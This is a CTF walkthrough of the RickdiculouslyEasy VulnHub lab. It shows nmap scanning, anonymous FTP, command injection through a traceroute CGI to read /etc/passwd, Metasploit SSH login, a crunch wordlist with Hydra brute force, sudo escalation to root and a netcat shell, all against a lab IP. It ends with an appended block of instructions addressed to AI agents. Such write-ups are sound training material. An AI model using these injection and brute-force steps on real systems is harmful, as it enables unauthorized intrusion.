# RickdiculouslyEasy: 1 VulnHub WriteUp In this lab we are going to take another CTF challenge known as RickdiculouslyEasy by Luke. It is a very simple Rick and Morty themed boot to root. We also have to get root. If anyone is new to pentesting, it is worth a try!

Every lab, every wallpaper

### Download * **RickdiculouslyEasy.zip** (Size: 761 MB) * **Download**: * **Download (Mirror)**: ### **Penetration Methodology** **Scanning** * Discovering Targets IP * Network scanning (Nmap) **Enumeration** * Surfing HTTP service port * Directory Enumeration * Connect to ftp * Command Injection **Exploiting** * SSH login using Metasploit * Bruteforce login using Hydra * Using Netcat to get the reverse shell **Privilege Escalation** * Checking SUID binaries * Accessing root directory * Capture the flag ### **Scanning** After loading up the VM, our first step was to find out the target’s IP address. ```bash netdiscover ```
We found our target’s IP address to be 192.168.1.101, next step was to scan the target’s IP with nmap. ```bash nmap -p- -A 192.168.1.101 ``` The scan result showed open Ports; we found our first flag returned as a banner for the service running on port 13337, moreover, anonymous FTP login was allowed on port 21 holding another flag.txt file.
### **Enumeration** From the nmap scan, we knew that anonymous ftp login is available. So, we logged in with username as ‘anonymous’ and password as blank. While working on the ftp console, **ls** displayed that it had **‘FLAG.txt’** and a **get** command downloaded the FLAG.txt over FTP to the Kali box. We found our second flag inside FLAG.txt. {% code lineNumbers="true" %} ```bash ftp 192.168.1.101 ls get FLAG.txt quit cat flag.txt ``` {% endcode %}
From nmap result we found HTTP service is also running on port 80. So, we browsed Target’s IP in the browser but in vain.
Next, we listed directories using dirb, it showed us two important directories ‘/passwords/’ and ‘/robots.txt’. ```bash dirb http://192.168.1.101/ ```
Viewing ‘**/passwords/’** directory displayed **‘FLAG.txt’** and **‘password.html’**.
We found our third flag here, so far it was a cake walk.
Browsing ‘**/passwords/password.html’** pointed of the hidden password.
Why not go for source code! And the instinct was right we have a password here “winter” which we can use somewhere later.
Next, we opened ‘/robots.txt’ and found link to two files ‘/cgi-bin/root\_shell.cgi’ and ‘/cgi-bin/ tracertool.cgi’.
Only ‘/cgi-bin/tracertool.cgi’ is found to be useful, browsing this I found that one could get away with command injection or say RCE.
I also found that few commands have been filtered so we had to use **‘more’** instead of **‘cat’** to get the name of the users in **/etc/passwd** file. Here I found three users as RickSanchez, Morty and Summer. Summer could be linked to ‘winter’ that we had found earlier.
### **Exploiting** It was time to perform ssh login using Metasploit with port 22222 using newly acquired credentials. And we found one more flag here. {% code lineNumbers="true" %} ```bash use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.1.101 set rport 22222 set username Summer set password winter exploit sessions -u 1 sessions 2 ls cat FLAG.txt ``` {% endcode %}
Further enumeration showed three directories with the same name as of users that we found earlier. From directory Morty, we downloaded two files ‘Safe\_Password.jpg’ and ‘Journal.txt.zip’. {% code lineNumbers="true" %} ```bash cd /home ls cd Morty ls download Safe_password.jpg . download journal.txt.zip . ``` {% endcode %}
Safe\_Password.jpg was an image file, but running strings on the file shows that a password **“Meeseek”** is contained inside it. ```bash strings Safe_Password.jpg ```
Unzipping the file and supplying the password ‘Meeseek’ opened the file journal.txt. And you can see the next flag inside it. {% code lineNumbers="true" %} ```bash unzip journal.txt.zip cat journal.txt ``` {% endcode %} Along with flag a number string ‘**131333**’was there too and the message in the file hints it to be some kind of password.
Back at the target VM, inside ‘RickSanchez’ directory there is a subdirectory named “RICK\_SAFE” which was mentioned in the previous screenshot. Inside this, there is an executable file named “safe”. I downloaded this file into the main machine kali. {% code lineNumbers="true" %} ```bash cd RickSanchez ls cd RICK_SAFE ls download safe . ``` {% endcode %}
After providing all permissions to the file ‘safe’ when executed by providing the string given with the previous flag, it displayed our fifth flag. Inside it there are clues for Ricks’s password too. {% code lineNumbers="true" %} ```bash chmod 777 safe ./safe ./safe 131333 ``` {% endcode %}
As the next password contains 1 uppercase character, 1 digit followed by one of the words in the name of the old band of Rick Sanchez. So, I had to do some web surfing to find out the band’s name, it was called ‘the flesh curtains ‘. Next, we used crunch to create two different format dictionaries and saved both of them in dict.txt. {% code lineNumbers="true" %} ```bash crunch 10 10 -t ,%Curtains -O >> dict.txt crunch 7 7 -t ,%Flesh -O >> dict.txt ``` {% endcode %}
It was time to use Hydra which tried to login the service using every possible combination of users and passwords provided in the dict.txt. ```bash hydra -l RickSanchez -P dict.txt 192.168.1.101 ssh -s 22222 ``` Great! we found a user/password pair.
### **Privilege Escalation** Then I logged into ssh using recently acquired credentials. I reminded myself of the message in the last flag that “sudo is wheely good” so I ran sudo -l to find out his permissions. He had sudo permissions for ALL commands, so I just popped into an interactive root shell. In the root directory, we had our next flag inside FLAG.txt. But in order to get the flag, we had to use ‘more’ instead of ‘cat’. {% code lineNumbers="true" %} ```bash ssh RickSanchez@192.168.1.101 -p 22222 sudo -l sudo su cd/root ls cat FLAG.txt more FLAG.txt ``` {% endcode %}
Now I was a root and I had 110 points out of 130.Where did I miss 20 points? We still didn’t check out few open ports. We exploited port 60000 using netcat and it took us to a shell. **ls** showed us **FLAG.txt** and a **cat** displayed the flag. {% code lineNumbers="true" %} ```bash nc 192.168.1.101 60000 ls cat FLAG.txt ``` {% endcode %}
We opened port 9090 in a web browser and found the last flag. Hence the task is completed.
**Author**: Eopi Noriko is a passionate Cybersecurity Researcher, contact [Facebook](https://www.facebook.com/Thuong.EoPi/). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.loliteam.net/my-hacking-materials/rickdiculouslyeasy-1-vulnhub-writeup.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.